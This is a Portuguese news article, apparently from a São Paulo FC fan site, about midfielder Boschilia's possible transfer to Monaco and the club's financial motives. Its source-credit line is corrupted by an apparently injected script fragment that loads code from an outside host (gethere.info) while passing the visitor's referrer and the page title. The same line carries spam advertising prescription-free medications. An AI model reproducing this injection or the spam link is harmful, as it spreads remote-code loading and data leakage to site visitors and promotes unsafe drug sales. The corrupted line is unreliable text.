Destaque

Boschilia se esquiva sobre Monaco, mas São Paulo mantém negociações

Boschilia deve ser mais um a deixar o São Paulo nesta temporada, mas prefere ainda não falar sobre o assunto. No desembarque no Aeroporto de Congonhas nesta quinta-feira, o meia tricolor se esquivou ao ser questionado sobre uma possível transferência ao Monaco.

– Não sei de nada. Isso é com o meu empresário – disse o jogador.

Os valores da negociação devem chegar a 10 milhões de euros (cerca de R$ 37 milhões) pelo jogador – o clube tem 50% dos direitos econômicos. No aeroporto, Ataíde Gil Guerreiro negou que o negócio já esteja sacramentado, e não colocou um prazo para concretizá-lo

– Existe uma negociação que vai ser demorada, estamos no início dela, temos até 31 de agosto. Estou com sangue frio, o Monaco também, e vai demorar um pouco. Isso já tem três meses e eu estava segurando, mas na semana passada tive de fazer uma troca de e-mails e, quando isso chegou ao Morumbi, alguém da minha diretoria contou de maneira equivocada para a imprensa. Não está fechado, pode demorar ou não. Neste momento, existe uma diferença entre o que o São Paulo quer e o que o Monaco quer pagar
– confirmou o vice de futebol do São Paulo.

Em participação no programa “Seleção SporTV” desta quinta-feira, Caio Ribeiro explicou que o Tricolor tenta receber um valor superior ao que tem direito. Por conta dos problemas econômicos, quer amarrar o contrato para conseguir mais dinheiro na transferência.

– Já acertaram que os valores giram em torno de 9 milhões de euros, mas o São Paulo pede mais dos 50% que tem direito porque sente que tem direito de vitrine e de clube formador. O valor final está praticamente acertado e há um consenso que, provavelmente, o Boschilia deixará o São Paulo. A questão é quanto o clube vai pegar na negociação. Ele está pleiteando um pouco mais do que tem direito – disse o comentarista, que conversou com pessoas envolvidas no caso.

A venda de mais um atleta evidencia o momento financeiro delicado vivido pelo clube. Em conversas com seus aliados, o presidente Carlos Miguel Aidar já havia dito que, se boas propostas aparecessem, nenhum atleta era inegociável, o que acabou se confirmando.

Na derrota para o Atlético-MG, por 3 a 1, na quarta-feira, Boschilia substituiu o atacante Luis Fabiano no segundo tempo, mas pouco conseguiu fazer. Na atual temporada, o meia tem três gols marcados.

Fonte: Ges.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap pills put in cart cheat medications without prescription – http://mediolleno.com.sv/sin-categoria/put-in-cart-cheat-medications-without-prescription

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

5 × 4 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Tricolor empata com o Ceará na Arena Castelão

saopauloadmin26 de novembro de 2020

Após mais de dois anos, Joao Rojas viaja com o elenco do São Paulo

saopauloadmin24 de novembro de 2020

São Paulo fica somente no empate com o Vasco no Morumbi

saopauloadmin22 de novembro de 2020

Dez motivos que fizeram o São Paulo dar a volta por cima

saopauloadmin20 de novembro de 2020

Tricolor elimina o Flamengo e avança para a semifinal na Copa do Brasil

saopauloadmin19 de novembro de 2020

Tricolor vence o Fortaleza e cola na liderança do Brasileirão

saopauloadmin15 de novembro de 2020

Brenner decide após falha e São Paulo abre vantagem contra o Flamengo na Copa do Brasil

saopauloadmin12 de novembro de 2020

Além do título inédito, saiba o que mais a Copa do Brasil pode trazer ao São Paulo

saopauloadmin11 de novembro de 2020

São Paulo é eliminado pelo Lanús na Sul-Americana

saopauloadmin5 de novembro de 2020